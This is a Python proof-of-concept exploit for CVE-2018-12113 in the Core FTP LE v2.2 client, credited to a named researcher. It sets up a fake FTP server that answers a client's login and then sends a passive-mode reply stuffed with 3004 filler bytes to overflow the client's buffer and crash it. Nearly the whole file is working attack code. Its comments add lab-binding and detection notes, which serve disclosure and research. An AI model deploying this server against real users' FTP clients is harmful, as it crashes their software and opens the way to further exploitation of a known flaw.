PoC for CVE-2018-12113
#!/usr/bin/env python
# coding: utf-8
############ Description: ##########
# The vulnerability was discovered during a vulnerability research lecture.
# This is meant to be a PoC.
####################################
# Exploit Title: Core FTP LE v2.2 Build 1921 (Client) - Buffer Overflow PoC
# Date: 12 Jun 2018
# Exploit Author: Berk Cem Göksel
# Contact: twitter: @berkcgoksel || bgoksel.com
# Vendor Homepage: http://www.coreftp.com/
# Software Link: http://www.coreftp.com/download
# Version: Core FTP Client LE v2.2 Build 1921
# Tested on: Windows 10
# Category: DoS
# CVE : CVE-2018-12113
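import socket

# Minimal fake FTP server for reproducing the client-side crash in a test
# setup. It answers each client message with a canned reply in a fixed order
# and never parses what the client sent.

# '0.0.0.0' listens on every interface of the host. When the client under
# test sits on a known lab segment, bind to that interface's address instead
# so the listener is not reachable from other networks.
IP = '0.0.0.0'
port = 21

# Length of the filler placed in the PASV reply.
# NOTE(review): the name suggests this is the offset at which the client's
# stack buffer is overrun; that is taken from the original PoC, not verified.
Stack_beginning = 3004

# Filler bytes only (0x90 repeated), sized from Stack_beginning rather than a
# second hard-coded 3004 so the two values cannot drift apart.
buff = b"\x90" * Stack_beginning

try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind((IP, port))
    s.listen(20)
    print("[i] FTP Server started on port: "+str(port)+"\r\n")
except socket.error:
    print("[!] Failed to bind the server to port: "+str(port)+"\r\n")
    # Stop here: without a bound, listening socket the accept() loop below
    # cannot work (the original fell through and failed later instead).
    raise SystemExit(1)

while True:
    conn, addr = s.accept()
    try:
        # The reply codes match a typical login dialogue (presumably USER,
        # PASS, SYST, PWD, PASV); each recv() output is printed for the log.
        conn.send(b'220 Welcome!' + b'\r\n')
        print(conn.recv(1024))
        conn.send(b'331 OK.\r\n')
        print(conn.recv(1024))
        conn.send(b'230 OK.\r\n')
        print(conn.recv(1024))
        conn.send(b'215 UNIX Type: L8\r\n')
        print(conn.recv(1024))
        conn.send(b'257 "/" is current directory.\r\n')
        print(conn.recv(1024))
        # A well-formed 227 reply carries six comma-separated decimal numbers
        # (h1,h2,h3,h4,p1,p2) between the parentheses. Here that field holds
        # Stack_beginning raw bytes, which is the malformed input the PoC is
        # about. A client has to bound and validate the field before copying
        # it; on the wire, a 227 reply far longer than a valid address tuple
        # is a usable detection signal.
        conn.send(b'227 Entering Passive Mode (' + buff + b')\r\n')
        print(conn.recv(1024))
        conn.send(b'257' + b'\r\n')
    finally:
        # Release the per-client socket after every dialogue; the original
        # never closed it and leaked one descriptor per connection.
        conn.close()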